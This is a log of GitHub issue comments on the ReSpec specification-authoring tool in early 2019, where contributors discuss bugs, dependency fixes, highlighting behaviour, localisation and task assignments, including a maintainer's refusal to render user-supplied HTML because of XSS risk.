[2019-02-19 01:58] EvsChen commented on #1858
A little problem when trying to get the mdn spec json file. How should I find the key in [SPECMAP.json](https://github.com/w3c/mdn-spec-links/blob/master/SPECMAP.json) by respecConf?

Using `edDraftURI` is a good idea but I'm not sure if it's required for any spec. Using `shortName` seems not feasible due to the various hostnames, i.e. `w3c.github.io`, `csswg.org` etc.

[2019-02-19 02:13] marcoscaceres commented on #1858
The URLs in the spec map don't matter I think. You can match on value being the shortName. All short names are unique. So, you can do:

[code]

[2019-02-19 02:15] marcoscaceres commented on #1858
alternative to the above...

[2019-02-19 03:35] marcoscaceres commented on #1631
@Swapnilr1 you can work together with @devanshbatra04 on it - see the feedback I gave in the pull request. If you guys want to split the task up, that would be great. There is a ton to do. But work out the design of the module first... what's it going to `export`?, how is it going to fetch stuff?, and so on...

[2019-02-19 04:47] #2100 closed

[2019-02-19 06:37] Swapnilr1 commented on #2097
I would like to take this up.

[2019-02-19 06:39] Swapnilr1 commented on #1631
@marcoscaceres Sure. @devanshbatra04 I hope it is OK with you if we can split this?

[2019-02-19 07:11] marcoscaceres commented on #2097
Actually, just looked and doesn’t look like it’s possible :( there are some w3c specific things.

[2019-02-19 07:11] #2097 closed

[2019-02-19 09:24] devanshbatra04 commented on #1631
Yes, sure. Here are all the corrections (as of now) in the PR that should be made, other than the module itself

- [ ] Shift the renamed getHeaders function to ```core/github-api```, and also export it. We also need to make these changes.
- [ ] Add token only auth to getHeaders, and then refactor https://github.com/w3c/respec/pull/2099/files#diff-fd8e14e6c335ae838f06d979287518d8R27
- [ ] Use the n

[2019-02-19 16:28] iherman opened #2109 "(Minor) non-breaking space should be used for §"
## Description of problem

Recently respec changed the cross-references to sections by preceding the section title with the '§' character. However, currently that character is followed by a space and the section number; instead, it should be followed by a _non breaking space_ and the section number. Otherwise, we get effects like this:

![opera snapshot_2019-02-19_172353_w3c github io](https://use

[2019-02-19 22:35] marcoscaceres commented on #2109
Indeed! Let me see if I can find some to fix this quickly.

[2019-02-19 23:45] EvsChen commented on #1858
Great, thanks! If `shortName` is sufficient, the url doesn't matter then.

[2019-02-20 00:31] EvsChen commented on #1858
I've made a PR for the first part of the plugin. PTAL @marcoscaceres. If everything looks good, I could move on.

[2019-02-20 05:41] CodHeK commented on #1970
Does this mean, if the `<pre>` element has `class="nohighlight"` we need not wrap the contents of the `pre` inside `code` ? And wrap it other case when some other class or no class is used for the pre tag.

[2019-02-20 05:45] saschanaz commented on #1970
This issue is closed so I'll comment in #2098.

[2019-02-20 05:46] CodHeK commented on #1970
I'll just paste the comment in #2098

[2019-02-20 05:46] saschanaz commented on #2098
From https://github.com/w3c/respec/issues/1970#issuecomment-465433018:

I'd say yes.

[2019-02-20 05:46] CodHeK commented on #2098
Does this mean, if the `<pre>` element has `class="nohighlight"` we need not wrap the contents of the `pre` inside `code` ? And wrap it other case when some other class or no class is used for the pre tag.

[2019-02-20 05:50] CodHeK commented on #2098
@saschanaz but, then in cases such as these ...

[code]

[2019-02-20 05:53] CodHeK commented on #2098
We'd have to check if it the `pre` is a pure `code` element or not and warp it accordingly

[2019-02-20 05:54] saschanaz commented on #2098
I doubt anyone would mix hyperlinks and actual codes within a single element... Have you seen such cases? @marcoscaceres

[2019-02-20 05:55] marcoscaceres commented on #2098
What @marcoscaceres said. I don't think we should support linking in those case. If we do eventually support linking, we should do that in as part of a different issue.

[2019-02-20 10:11] CodHeK commented on #2098
So, I guess the only change here would to be add an if condition right ?

[code]

[2019-02-20 10:28] saschanaz commented on #2098
I hope we do slightly more: https://github.com/w3c/respec/issues/2098#issuecomment-464547954

In this case, we check whether a `<pre>` have a  `<code>` as its sole child. If it does we should use `code` inside `pre` to highlight, otherwise we should use `<pre>`.

[2019-02-20 10:32] saschanaz commented on #2098
With `<code>` Maybe we could do:

[code]

[2019-02-20 11:09] marcoscaceres commented on #2098
Yeah, that makes sense. Might also have multiple code blocks?

[2019-02-20 12:02] CodHeK commented on #2098
@saschanaz  Okay, so, what we need to do here is :

Check if `<pre>` has `<code>` in it, if yes then it gets highlighted according to the class in `<code>` else we wrap the content of `<pre>` in `<code>` right ?

[2019-02-20 12:04] saschanaz commented on #2098
@CodHeK Exactly. Would be simpler if we do the wrapping first and then highlight for each `<code>` inside.

[2019-02-20 12:12] CodHeK commented on #2098
@saschanaz is this the proper highlighting for the case you mentioned above ...

![screenshot 2019-02-20 at 5 41 24 pm](https://user-images.githubusercontent.com/22097366/53090993-df28a600-3536-11e9-8e1e-80a3fcd72068.png)

[2019-02-20 12:14] saschanaz commented on #2098
`//` parts shouldn't be highlighted as comments as they are not in `<code>`.

[2019-02-20 12:16] CodHeK commented on #2098
Ah, sorry it's for this case,

[code]

It's when, the content gets wrapped in `<code>`

[2019-02-20 12:18] saschanaz commented on #2098
Ah yes, looks good then.

[2019-02-20 12:31] CodHeK commented on #2098
@saschanaz sent a PR that'll just wrap if node `<code>` is found within `<pre>` #2111

[2019-02-20 14:16] ThobyV opened #2112 "Difficulty Installing respec dependencies."
* ReSpec version: 24.3.3
* Linux Fedora OS

Difficulty Installing respec dependencies.

Steps to reproduce: `npm install`

I have npm errors while trying to install respec dependencies for the first time so I can run some  tests.  Later I discovered it was due to a dependency *highlight.js*  from _package.json_ `(    "highlight.js": "github:highlightjs/highlight.js#cli" )` which breaks the install

[2019-02-20 14:44] sidvishnoi commented on #2112
Does removing just the `#cli` part help?
If it does, just remove the `#cli` and please send us a PR for same.
`package.json` can have a dependency in the form of `"github:user/repository#branch"`. It looks like `cli` branch doesn't exist there anymore.

@marcoscaceres As we'll be installing from master branch directly, we better use a tag instead.

[2019-02-20 15:42] andrea-perego opened #2113 "Issue with "person" extras field"
## Important info

* URL to affected spec: currently not online
* ReSpec version: 24.3.3
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

It seems that, if the `name` field in `extras` has HTML code as value, this is returned escaped in the document.

E.g., re-using the example in https://github.com/w3c/respec/wiki/person :

[code]

This is what will be shown in the

[2019-02-20 15:46] sidvishnoi commented on #2113
For someone looking into fixing this:
https://github.com/w3c/respec/blob/2936011fdc52e4a608181ed088cd77a2bb38e017/src/w3c/templates/show-people.js#L81

[2019-02-20 15:52] kodemonster commented on #2113
@sidvishnoi  whats the issue exactly?

[2019-02-20 15:58] sidvishnoi commented on #2113
@kodemonster We're setting `textContent` while we should be setting `innerHTML`.

![difference](https://user-images.githubusercontent.com/8426945/53104961-47d34b00-3556-11e9-8020-d1ffc95280af.png)

[2019-02-20 16:36] plehegar opened #2114 "SOTD section is informative"
## Important info

* URL to affected spec: https://w3c.github.io/pointerevents/
  (more precisely, as of
 https://raw.githubusercontent.com/w3c/pointerevents/298f3f4730b7afe18d31b86856672ea71ca0d141/index.html )

* ReSpec version: 24.3.3
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

Respec seems to treat the SOTD section as normative for the purpose of external r

[2019-02-20 18:26] Swapnilr1 commented on #1631
@devanshbatra04 I am looking into it, sorry for the delay.

[2019-02-20 20:39] marcoscaceres commented on #2112
Ah yes, sorry! I landed the highlight CLI yesterday and forgot to update this.

[2019-02-20 21:06] ThobyV commented on #2112
@sidvishnoi .. Removing the `#cli` fixed the problem! I will send a fix.

[2019-02-20 21:08] ThobyV commented on #2112
@marcoscaceres yikes. 😂

[2019-02-20 21:12] ThobyV commented on #2112
Some people may also have errors with `npm install` being stuck on `loadIdealTree`.

Deleting `package-lock.json` and then running `npm install` works just fine.

[2019-02-21 03:03] #2112 closed

[2019-02-21 05:24] #2114 closed

[2019-02-21 11:27] marcoscaceres commented on #2113
I'm worried about supporting this, tbh. Including the HTML is XSS attack vector. We should instead add support for an image object instead.

[2019-02-21 11:28] marcoscaceres commented on #2113
(We can replicate what we do for logos here)

[2019-02-21 12:33] #2109 closed

[2019-02-21 12:35] marcoscaceres commented on #2109
It's now in the tree, so will ship it with next release (probably a couple of days).

[2019-02-21 12:41] iherman commented on #2109
thanks @marcoscaceres

Cc: @gkellogg

[2019-02-21 12:42] marcoscaceres commented on #2109
If it's affecting publication or anything, happy to release it. Let me know.

[2019-02-21 12:43] marcoscaceres commented on #1741
Just checked... was actually fixed at some point.

[2019-02-21 12:43] #1741 closed

[2019-02-22 00:48] saschanaz commented on #2113
While I agree with your concern, we already support HTML for some fields (#1594). What's the difference here? Should we block HTML support for existing fields?

[2019-02-22 00:54] marcoscaceres commented on #2113
I think we should actually. I think we should make all configuration options idempotent and retract them to text.

However, for headers, we should allow people to override or add their own things using HTML directly in the document. Like, in the header:

[code]

[2019-02-22 00:55] marcoscaceres commented on #2113
* restrict

[2019-02-23 08:20] yatri1609 commented on #2051
@marcoscaceres Is anyone working on this? If not I can work on this, if you approve.

[2019-02-23 08:50] marcoscaceres commented on #2051
I'm actually working on it at the moment 😬 Turned out to be actually quite a lot of work.

[2019-02-23 10:32] #2051 closed

[2019-02-23 12:00] sidvishnoi commented on #1582
Reopening as there are more items in checklist

[2019-02-24 12:11] saschanaz commented on #1482
https://github.com/snyk/snyk/pull/355 fixed this 👍

[2019-02-24 12:11] #1482 closed

[2019-02-24 12:32] saschanaz commented on #1975
We have too many blockers. Currently requirejs is only used for debugging, how about we add [a non-optimized mode](https://webpack.js.org/concepts/mode/) so that we can get a debugger-friendly build?

[2019-02-24 13:12] marcoscaceres commented on #1975
I'd be down with that - from another project I was working on, source mapping remains a disaster.

[2019-02-24 13:20] saschanaz commented on #1975
The main issue for me is that too many lines are optimized out so that breakpoints cannot be added consistently. What ware your problems there?

[2019-02-24 13:23] marcoscaceres commented on #1975
... but working with the non-optimized mode totally works, even if it means debugging at package with like 30,000+ lines.

[2019-02-24 13:26] marcoscaceres commented on #1975
Just trying to set breakpoints and then stepping... it was completely erratic (jumps to random places, or can't actually set a breakpoint, etc).

[2019-02-24 13:32] saschanaz commented on #1975
Hmm... how about we add a non-optimized build option without actually removing requirejs and see how it works?

[2019-02-24 13:33] marcoscaceres commented on #1975
Sounds good to me :)

[2019-02-24 13:34] marcoscaceres commented on #1975
it seems totally fine to just have the non-optimized version for development, and hopefully be able to use webpack's development server too.

[2019-02-24 13:59] marcoscaceres opened #2124 "META: Google Summer of Code 2019"
If you are here for GSoC 2019, you are free to get involved by reading our [developer guide](https://github.com/w3c/respec/wiki/Developers-Guide).

**If you are new to programming, or are still learning JavaScript, HTML, CSS, then it's unlikely you will be selected.** Please note that being new to programming is not the same a being new to open source. You need to be proficient at both.

To be con

[2019-02-24 17:58] yatri1609 commented on #2021
@coderquill are you working on it or should I go forward with it ?

[2019-02-24 18:33] coderquill commented on #2021
@yatri1609  yes, please go ahead. I'm still stuck.

[2019-02-25 05:12] yatri1609 commented on #948
@marcoscaceres Can I work on this?

[2019-02-25 05:28] marcoscaceres commented on #948
@yatri1609 go for it!

[2019-02-25 07:45] yatri1609 commented on #948
Thanks @marcoscaceres I'll send a PR by tonight

[2019-02-25 14:22] gabru-md commented on #2113
Hi, I'd like to provide a fix if this issue is still open?
decoding the `extra.name` before assignment can be a fix for this, isn't it?  :sweat_smile:
Thanks!

[2019-02-25 14:41] marcoscaceres commented on #2113
Decoding is not the problem: using fields intended to be text to include html is the problem.

[2019-02-25 14:48] gabru-md commented on #2113
changing the `textContent` to `innerHTML`  should help then? as shown here in this comment :

should I provide a fix for this as it is labelled as a good first issue. I would definitely like to get started to the project :sweat_smile:

[2019-02-25 15:07] marcoscaceres commented on #2113
Sorry, you are missing some context. Using innerHTML from uncostrained user input is bad: it’s a way for someone to hack/attack ReSpec using a xss attack.

[2019-02-25 15:09] yatri1609 commented on #948
@marcoscaceres Is it necessary to you intersection observer as it can be easily done by simple and less complex js code?

[2019-02-25 15:09] marcoscaceres commented on #2113
What we should provide is the ability for an person to include an orcid string. We then generate the image based on the id.

[2019-02-25 15:12] marcoscaceres commented on #948
I’m open to suggestions. Try whatever you think is best and we can evaluate together.

[2019-02-25 18:57] yatri1609 commented on #948
@marcoscaceres I'm really confused with the code in `ui.js` file could you just give me a brief insight so that I could get a bit more clear. I have read about the implementation of the Intersection Observer API. Could you just throw a light on the path I need to take?

[2019-02-25 20:46] marcoscaceres commented on #948
Sure! Find me on Slack later today and we can go through it quickly.

[2019-02-26 14:57] plehegar commented on #1668
Missed this somehow, catching up...

It is no longer true that we don't allow JS except for fixup.js.

W3C TR allows "recognized" JS. The list is at https://www.w3.org/scripts/ (this is not a public page apparently, not sure why). https://www.w3.org/TR/webaudio/ uses MathJAX for example. https://www.w3.org/TR/clreq/ might be a mistake however (but pubrules doesn't seem to flag it).
Keep in mind th

[2019-02-26 14:59] plehegar commented on #1668
As a reference, here is the announcement: https://lists.w3.org/Archives/Public/spec-prod/2015JulSep/0014.html

[2019-02-26 15:15] Swapnilr1 commented on #1631
@devanshbatra04 Sorry for this trivial doubt: Since it is your PR and it is not merged, how do I make changes to your implementation? Would it be fine if I forked your fork and submitted changes to it? Or should we split the refactoring to different PRs (I think it might make a mess of merge conflicts)?

[2019-02-26 15:33] devanshbatra04 commented on #1631
I have given you collaborator access to my repository. Feel free to make changes on the branch. I will get back to this after my exams end this week. Also it would be great if you can ideate a bit about the github-api module by then.

[2019-02-26 21:18] #2008 closed

[2019-02-27 01:22] saschanaz commented on #1668
Thanks for the details! I don't expect our script to be *persistent and immutable*, though...

[2019-02-27 01:49] marcoscaceres commented on #1668
I guess we just want the clipboard.js script to be hosted, right?

We should also look at externalizing jQuery for those that need it still instead of bundling it. Just having jQuery outside the library would be a massive win for a lot of specs.

[2019-02-27 01:50] marcoscaceres commented on #1668
(the jQuery thing unrelated to TR docs... but still)

[2019-02-27 01:54] saschanaz commented on #1668
Probably also caniuse and MDN. Those *can* be static but should be dynamic to keep the numbers updated.

[2019-02-27 01:56] marcoscaceres commented on #1668
Yes, good suggestions.

[2019-02-27 02:57] AdityaSrivast commented on #1582
@sidvishnoi I would like to work on it. Can you please brief me on what is to be done?

[2019-02-27 11:03] saschanaz opened #2127 "Use highlight.js master branch"
From #2125,

We'll have to migrate to the master branch where we can't build by calling `hljs`.

[2019-02-27 12:14] zoyron commented on #2021
Greetings, @marcoscaceres . I just finished understanding the syntax of Javascript. I'm looking to enhance my development skills as well. I would like to work on this issue under your guidance.
Thank You

[2019-02-27 12:22] zoyron commented on #2113
Greetings, @andrea-perego . I just finished understanding the syntax of Javascript. As I am new to the field of open source, and this seems like a good opportunity to learn, I would like to grab it. I would like to work on this issue under your guidance.
Thank You

[2019-02-27 13:16] andrea-perego commented on #2113
Pleased to meet you, @zoyron . Sorry, but you have to address your request to @marcoscaceres . I was just reporting the issue.

[2019-02-27 13:54] zoyron commented on #2113
@andrea-perego, sure. Thank you.

[2019-02-27 14:04] yatri1609 commented on #2021
@zoyron I am already working on this, you can have a look at some other issue.

[2019-02-27 14:25] zoyron commented on #2021
Sure, @yatri1609 .

[2019-02-27 17:59] isunitha98selvan commented on #2065
Hey. Can I work on this ?

[2019-02-27 18:25] isunitha98selvan commented on #2103
I would like to send a PR for this.

[2019-02-27 18:41] rishabh3112 commented on #2103
Sorry @isunitha98selvan, I didn't noticed your PR before sending mine. Have closed one I send :+1:.

[2019-02-27 18:47] isunitha98selvan commented on #2103
Cool thanks

[2019-02-28 01:22] awkawk commented on #1752
Worth also noting that the current note class documentation doesn't reflect the aria-heading output, instead it indicates that the "header" will be text within a nested div.

[2019-02-28 11:03] marcoscaceres commented on #1752
ok, we should do the headings and then fallback to spans only for level 7 and above.

[2019-02-28 11:27] marcoscaceres commented on #1752
@aardrian the CSS fixes should go into "base.css" - but can definitely do the others.

[2019-03-01 05:58] #2103 closed

[2019-03-01 06:09] isunitha98selvan commented on #2061
If no one is currently working on this, I would like to take this issue up.

[2019-03-01 06:11] isunitha98selvan commented on #1905
If no one is working on this, I would like to take it up.

[2019-03-01 07:19] saschanaz commented on #1905
@isunitha98selvan Good, feel free to ask questions when need.d

[2019-03-01 10:03] r12a opened #2131 "Linking to sections & figures"
This has become so annoying that i'm finally making time to raise an issue. Currently automatic completion of link text for links pointing to sections and figures is prompted by creating a `a` element without link text, eg. `<a href="#myfragid"></a>`. This produces no visible rendered text if the link fails, and also in Dreamweaver's design view (which i use all the time). You get something such a

[2019-03-01 10:06] r12a commented on #2131
Also, section references have recently begun including § at the start. Is that intentional?  I wish they wouldn't.

And i'm inclined to think that the figure references have only recently begun adding a colon at the end (though maybe i'm mistaken, and they did this before).  Anyway, it doesn't look good, and may be problematic for the non-english localisations of respec.

[2019-03-01 15:13] r12a commented on #2131
I hope the above doesn't come across as too abrupt or critical.  I'm a great fan of Respec!  If we could improve this small feature that would make it even better :-)

[2019-03-01 22:58] marcoscaceres commented on #2084
@isunitha98selvan, do you want to collaborate with @ThobyV? See his pull requests and details above to get an idea of what needs to be done. There are lots of these little modules, so it’s a great way to get started.

[2019-03-01 23:12] marcoscaceres commented on #2061
@isunitha98selvan, sure, go for it.

[2019-03-02 02:11] isunitha98selvan commented on #2084
Sure I will do that.

[2019-03-02 15:08] ThobyV commented on #2084
@isunitha98selvan you're welcome to ask me anything if you will.

[2019-03-02 15:29] marcoscaceres commented on #2084
@ThobyV do you have a rough approximation of which are left. The W3C ones can mostly be ignored.

[2019-03-02 15:41] ThobyV commented on #2084
@marcoscaceres  I am currently working on the module `figures.js` and I think this module uses the `conf` object for localization only. I checked that the `run` fucntion collects `conf` object and passes to `collectFigures()` and `decorateFigure` which then uses it for localization of captions.

The linter will not tolerate removing it from the functions that pass it around except it is removed to

[2019-03-02 15:54] ThobyV commented on #2084
I think there are 4 modules which I have not worked on in the /W3C and 2 left in /Core.  the w3c has most localization work.

[2019-03-03 01:44] marcoscaceres commented on #2084
Sorry, I meant finding places where we have hard-coded user facing English strings and replacing then with localized versions. There are plenty that don’t use the l10n object.

[2019-03-03 05:37] ThobyV commented on #2084
Oh... No wonders. Thanks for explanations. I also thought about non-hard codeds 😙

[2019-03-03 09:14] marcoscaceres commented on #2131
@r12a, a quick fix for the section markers is adding `addSectionLinks: false` to your ReSpec config.

We did enable them by default, as they provide a convenient way to link to sections without needed to go  to the ToC.

Not sure I follow. Could you please point me to an affected spec so I can take a look?

[2019-03-03 13:35] #1438 closed

[2019-03-03 13:44] marcoscaceres opened #2133 "Best practices should use .advicement class"
Best practice boxes should use the W3C’s advicement css class. We currently use out own custom style.

[2019-03-04 04:31] isunitha98selvan commented on #1905
@saschanaz I added "checkJS":true to jsconfig.json. I then tried to test it by running: tsc -p jsconfig.json. I got a bunch of TS5055 errors i.e JS file would overwrite input file. I am kind of stuck here. How should I proceed?

[2019-03-04 05:07] saschanaz commented on #1905
@isunitha98selvan That's weird, would you try `npm run lint` instead?

[2019-03-04 11:08] r12a commented on #2131
hi @marcoscaceres I like to have the section links on, that's a useful addition.  I'd just prefer not to have the § character show up in the link to a section. For an example, see https://w3c.github.io/iip/devanagari/#h_line_breaking

On closer inspection, the problem with figure references seems to be caused by a local stylesheet, so no problem there after all. Sorry for the noise. (The rule was

[2019-03-04 13:20] marcoscaceres commented on #2084
Accidentally closed this

[2019-03-04 13:21] marcoscaceres commented on #2098
Fixed by #2132

[2019-03-04 13:21] #2098 closed

[2019-03-04 17:17] isunitha98selvan commented on #1905
@saschanaz ended up with almost 795 errors! Not sure where to start debugging

[2019-03-04 17:33] isunitha98selvan commented on #2133
I would like to work on this. So I would have to replace bp.css with advancement css class in best-practise.js, right? How do I go about testing it?

[2019-03-04 19:42] isunitha98selvan commented on #2133
As far as I understand this, practisedesc styling needs to be changed such that it uses advisement class. We can set this class along with the <p> tag. Can we remove bp.css and change the documentation such that we use <p class="advisement"> instead of <p class="practicedesc"> ?

[2019-03-05 00:25] saschanaz commented on #1905
You can ignore errors from third-party libraries for now.

[2019-03-05 03:28] greenkeeper[bot] opened #2137 "An in-range update of puppeteer is breaking the build 🚨"
## The dependency [puppeteer](https://github.com/GoogleChrome/puppeteer) was updated from `1.12.2` to `1.13.0`.

🚨 [View failing branch](https://github.com/w3c/respec/compare/develop...w3c:greenkeeper%2Fpuppeteer-1.13.0).

This version is **covered** by your **current version range** and after updating it in your project **the build failed**.

puppeteer is a direct dependency of this project, and

[2019-03-05 05:32] #2137 closed

[2019-03-05 06:19] greenkeeper[bot] opened #2139 "An in-range update of eslint is breaking the build 🚨"
## The devDependency [eslint](https://github.com/eslint/eslint) was updated from `5.15.0` to `5.15.1`.

🚨 [View failing branch](https://github.com/w3c/respec/compare/develop...w3c:greenkeeper%2Feslint-5.15.1).

This version is **covered** by your **current version range** and after updating it in your project **the build failed**.

eslint is a devDependency of this project. It **might not break yo

[2019-03-05 06:51] saschanaz commented on #2139
Fixed by https://github.com/w3c/respec/commit/130555b48b0f30331fdf8d0ed0f7c66a8318a40f

[2019-03-05 06:51] #2139 closed

[2019-03-05 15:00] plehegar opened #2140 "respec-highlight style sheet should appear before the W3C TR stylesheet"
## Important info

* URL to affected spec: https://w3c.github.io/performance-timeline/
* ReSpec version: 24.4.0
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

What happened (e.g., it crashed)?:

The W3C TR style sheet is no longer the last one to appear in html/head. The respec-highlight inline style sheet "github.com style" appears (race condition?) after the TR

[2019-03-05 15:06] marcoscaceres commented on #2140
Will fix first thing tomorrow.

[2019-03-06 12:36] marcoscaceres commented on #2140
Closed via #2141

[2019-03-06 12:36] #2140 closed

[2019-03-06 12:49] marcoscaceres commented on #2140
@plehegar fixed in latest published release. Hopefully all good now.

[2019-03-07 02:26] marcoscaceres opened #2144 "Copy button showing up in print view"
## Important info

* URL to affected spec:
* ReSpec version: Click the ReSpec pill (e.g., 20.0.1).
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

What happened (e.g., it crashed)?:
When printing from a spec:

<img width="524" alt="screenshot 2019-03-07 13 24 46" src="https://user-images.githubusercontent.com/870154/53927946-8cc1ba80-40dc-11e9-907f-a2519f33ceea.png

[2019-03-07 03:29] marcoscaceres commented on #2144
Should also check what is going on with the fonts.... those serifs in heading 🤢

[2019-03-07 20:28] aardrian commented on #1752
@marcoscaceres Is that just an FYI or are you asking me to do a PR?

[2019-03-07 22:51] marcoscaceres commented on #1752
Sorry @aardrian, I think I accidentally tagged you. However, PRs are always welcomed if you’d like to help out:) Otherwise, we would really appreciate any review to make sure we get the accessibility aspects right.

[2019-03-07 22:52] marcoscaceres commented on #1752
Actually, it’s all coming back to me. The base.css aspect do need to get bubbled up to the W3C.

[2019-03-08 05:17] isunitha98selvan opened #2145 "Add package-lock.json to .gitignore"
## Description of problem
package-lock.json locks the version of the dependencies involved. It should preferably be in .gitignore

[2019-03-08 05:36] marcoscaceres commented on #2145
So, we actually want the dependency locking, as it assures everyone is on the same version of the dependencies. That makes finding bugs more manageable.

[2019-03-08 08:20] pradeepgangwar commented on #2144
Let me try this one.

[2019-03-08 13:26] ThobyV commented on #2144
@marcoscaceres it seems to be an issue with the absence of print media queries for the button. I've made a fix in my branch but @pradeepgangwar can send a p.r let me know if you might need any help @pradeepgangwar

[2019-03-08 18:40] jnurthen opened #2147 "w3c/conformance end event is not being published in ARIA spec"
## Important info

* URL to affected spec: https://w3c.github.io/aria/
* ReSpec version: Click the ReSpec pill (e.g., 20.0.1): 24.4.4
* [] I did a "hard refresh", but it's still busted.
(not sure what this means)

## Description of problem

What happened (e.g., it crashed)?:
ARIA specific scripts are not running.
For example https://github.com/w3c/aria/blob/master/common/script/aria.js - the event

[2019-03-09 00:41] saschanaz commented on #2147
The quick fix is to add explicit `id="conformance"` to the conformance section.

#2122 caused this where the module won't publish an `end` event when there is no explicit id `conformance` assigned.

cc: @marcoscaceres

[2019-03-09 01:07] jnurthen commented on #2147
Thanks - that has fixed the issue. If it is too hard to fix issuing a respec error if the section is missing would be fine. At least it would be easy to find and resolve the issue.

[2019-03-09 07:43] #2147 closed

[2019-03-09 07:48] marcoscaceres commented on #2147
We should see about fixing some of the aria scrpit to move off the old ReSpec events model. We have a lot of legacy code in ReSpec just to support the aria specs, and it’s a bit of a burden as we deprecated those events about 3 years ago.

[2019-03-09 08:15] marcoscaceres commented on #2145
Closing this as wont fix. However, it was a good question, but not right for this project.

[2019-03-09 08:15] #2145 closed

[2019-03-09 10:32] pradeepgangwar commented on #2144
@ThobyV what are steps to reproduce it on a spec. I didn't get that button when running examples from examples folder.

[2019-03-09 10:50] pradeepgangwar commented on #1804
@marcoscaceres @sidvishnoi zi want to work on this. Let me try this.

[2019-03-09 12:17] ThobyV commented on #2144
Try using the `basic.html` sample spec from the examples folder (https://github.com/w3c/respec/blob/develop/examples/basic.html#L1-L114).  as It contains a `<pre>` class usage example (i think it used for code snippets in spec). Then try to print the generated spec page as a pdf or so from browser.

[2019-03-09 12:29] ThobyV commented on #2144
I think you should be able to see the code snippet copy/paste button in an unusual position in the pdf file preview unlike where it is on a spec webpage. I don't think chrome has the issue but it seems to be reproduceable on Firefox.

[2019-03-10 23:04] jnurthen commented on #2147
@marcoscaceres if there is someone who can help us I'd be happy to try to make this happen. The folks who wrote the code are not involved any more and I don't think any of us fully understand everything that is going on so some help would be appreciated.

[2019-03-11 03:52] lkttyagi commented on #2113
@marcoscaceres  i would like to work on this issue .can you just help me with how to start on it ?

[2019-03-11 07:24] pradeepgangwar commented on #2144
@marcoscaceres @ThobyV I am not able to reproduce this bug. I tried using examples in examples folder but they seem to work fine. All the copy buttons there have `removeOnSave` class which has already been set to hide on printing here. https://github.com/w3c/respec/blob/3149bac1783f6c80e81d710287bb77f57782b177/assets/respec2.css#L236

It would be great if you can help me finding the exact spec and

[2019-03-11 12:59] ThobyV commented on #2144
@pradeepgangwar you  are right, I think the bug is only reproduced if you do not already have a cached version of the css loaded from w3c hosted css if I am right.

Try to refresh the spec page more than once checking the print preview each time using `ctrl+shift+r` on your browser  (force page refresh).

I think a solution to the bug would be to add `display: none !important` instead of `display:

[2019-03-11 13:10] ThobyV commented on #2144
I am using `basic.html` spec to reproduce the bug since. It has (code snippets and the copy button will show).

Also, another solution might be to write print media query specific for the `.respec-button-copy-paste` class in `assets/webidl.css`. (as an alternative to not using !important for `.removeOnSave` class instead).

@marcoscaceres what do you think about this? Is it right way to approach t

[2019-03-11 20:43] marcoscaceres commented on #2144
Putting and explicit rule for  `.respec-button-copy-paste` into the print media rules seems like the best solution. Not a huge fan of `!important`.

[2019-03-11 22:01] Swapnilr1 commented on #1631
@devanshbatra04,

Yes, I think we can merge `core/github-config` into `core/github-api`.

And about the module itself, yes I agree with your design, `core/github-api` should contain 3 functions to fetch issues, comments and contributors. And in each function call, we can see if remaining requests is greater than number of issues/contributors/comments requested, resolving the array of promises if t

[2019-03-12 02:03] marcoscaceres commented on #2127
We can still use the cli branch. I need to chrck the weight of the prebuilt script vs our own custom build.

[2019-03-12 08:43] isunitha98selvan commented on #2133
@marcoscaceres any other way to go about this?

[2019-03-12 09:54] marcoscaceres commented on #2133
You will need to track down where the best practice boxes are generated. It's probably here:
https://github.com/w3c/respec/blob/develop/src/core/best-practices.js

I think you want to change `ul.classList.add("practicebox");` to add "advicement" instead. And then we can delete bp.css entirely.

[2019-03-12 09:55] marcoscaceres commented on #2133
(you will need to see how the best practices get rendered, however... to make sure they look right)

[2019-03-12 09:56] marcoscaceres commented on #2133
Visually, they should look like this after you make the change:
https://w3c.github.io/tr-design/src/readme.html#advisement

[2019-03-13 00:12] marcoscaceres commented on #2144
Button is still showing up in Firefox even after #2150, unfortunately. @ThobyV, you want to give it a shot and see if you can figure out a fix?

[2019-03-13 01:47] marcoscaceres commented on #1582
Talked with @himanish-star... we decided not to wrap the labels in UL. It appears that caching was done at some point.

[2019-03-13 01:47] #1582 closed

[2019-03-13 03:31] saschanaz commented on #1975
Note: the debug mode is added by #2149

[2019-03-13 04:46] marcoscaceres commented on #1752
Moved to https://github.com/w3c/tr-design/issues/175 ... will reopen depending on outcome of those discussions.

[2019-03-13 18:29] BigBlueHat opened #2152 "Add Turtle format language module"
Follow-up from #1063

## Description of problem

Many specs at the W3C (and elsewhere) use the [Turtle](https://www.w3.org/TR/turtle/) format.

There is **[a PR to highlight.js for adding Turtle](https://github.com/highlightjs/highlight.js/pull/1553/commits)** that has apparently been available since shortly after I filed #1063.

The JSON-LD WG is nearing CR for the [JSON-LD 1.1](https://w3c.githu

[2019-03-13 19:48] ThobyV commented on #2144
Sure @marcoscaseres I'll take it up. I had Journeyed to school so I just settled yesterday.

[2019-03-13 22:38] cygri commented on #2152
There was some further work on top of that PR by @VladimirAlexiev, which led to this branch:

https://github.com/VladimirAlexiev/highlight.js/tree/feature/language-sparql-ttl

I've tried this for SPARQL and Turtle, and it works well. I had to follow the [build instructions](https://highlightjs.readthedocs.io/en/latest/building-testing.html) to create a `highlight.pack.js` from source.

It looks li

[2019-03-13 23:02] marcoscaceres commented on #2152
We are currently moving await from using the hljs bundle. So, the way to do this is to use `preProcess` to load the highlighter language:

[code]

In the future, we will make this a bit easier... allowing languages to be dynamically loaded by just having a `highlightLanguages: ["xml", "rdf", "sparql"]` and so on....

[2019-03-13 23:05] marcoscaceres commented on #2152
Updated the above.

[2019-03-13 23:11] marcoscaceres commented on #2152
About the language support, I followed up:
https://github.com/highlightjs/highlight.js/pull/1553/

We need a maintainer for the language itself. I maintain hljs now.

[2019-03-14 03:03] VladimirAlexiev commented on #2152
My PR is also used in Ontotext training presentations, which are made with reveal.js, so I have some code to repackage hljs for reveal.

We have a task to merge my PR that's been outstanding for a year but now if the w3c wants to use it, I'll requisition a JS dev to do it.

See https://github.com/highlightjs/highlight.js/pull/1553

[2019-03-14 04:00] marcoscaceres commented on #2152
@VladimirAlexiev that would be great. I can get the repo set up for you on the hljs side and we can go from there.

[2019-03-14 10:20] isunitha98selvan commented on #2133
We want the advisement box in place of practisedesc. There is no element which refers to this in https://github.com/w3c/respec/blob/develop/src/core/best-practices.js.
